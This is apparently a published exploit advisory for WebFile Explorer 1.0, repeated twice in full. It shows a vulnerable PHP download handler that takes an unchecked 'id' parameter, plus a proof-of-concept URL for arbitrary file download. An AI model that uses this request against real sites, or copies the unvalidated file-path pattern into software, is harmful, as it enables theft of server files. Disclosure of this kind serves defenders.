VULHUB ™

* Exploit Title: WebFile Explorer 1.0 - Arbitrary File Download * Dork: N/A * Date: 09.08.2017 * Vendor Homepage : http://speicher.host/ * Software Link: https://codecanyon.net/item/webfile-explorer/20366192/ * Demo: http://speicher.host/envato/codecanyon/demo/web-file-explorer/ * Version: 1.0 * Category: Webapps * Tested on: WiN7_x64/KaLiLinuX_x64 * CVE: N/A * Exploit Author: Ihsan Sencan * Author Web: http://ihsan.net * Author Social: @ihsansencan ### Description: The security obligation allows an attacker to arbitrary download files.. Vulnerable Source: ``` 1............. 2$file = $_GET['id']; 3 4if (file_exists($file)) { 5header('Content-Description: File Transfer'); 6header('Content-Type: application/octet-stream'); 7header('Content-Disposition: attachment; filename="'.basename($file).'"'); 8header('Expires: 0'); 9header('Cache-Control: must-revalidate'); 10 ............. ``` ### Proof of Concept: ``` http://localhost/[PATH]/web-file-explorer/download.php?id=WebExplorer/[FILE] ```

* Exploit Title: WebFile Explorer 1.0 - Arbitrary File Download * Dork: N/A * Date: 09.08.2017 * Vendor Homepage : http://speicher.host/ * Software Link: https://codecanyon.net/item/webfile-explorer/20366192/ * Demo: http://speicher.host/envato/codecanyon/demo/web-file-explorer/ * Version: 1.0 * Category: Webapps * Tested on: WiN7_x64/KaLiLinuX_x64 * CVE: N/A * Exploit Author: Ihsan Sencan * Author Web: http://ihsan.net * Author Social: @ihsansencan ### Description: The security obligation allows an attacker to arbitrary download files.. Vulnerable Source: ``` 1............. 2$file = $_GET['id']; 3 4if (file_exists($file)) { 5header('Content-Description: File Transfer'); 6header('Content-Type: application/octet-stream'); 7header('Content-Disposition: attachment; filename="'.basename($file).'"'); 8header('Expires: 0'); 9header('Cache-Control: must-revalidate'); 10 ............. ``` ### Proof of Concept: ``` http://localhost/[PATH]/web-file-explorer/download.php?id=WebExplorer/[FILE] ```